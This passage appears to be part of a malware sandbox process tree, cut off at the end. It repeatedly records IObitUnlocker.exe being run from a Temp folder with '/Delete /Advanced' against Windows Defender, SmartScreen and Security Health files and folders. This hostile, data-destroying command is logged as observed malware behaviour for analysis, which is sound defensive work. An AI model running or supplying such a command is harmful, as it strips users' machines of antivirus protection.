                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9152
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 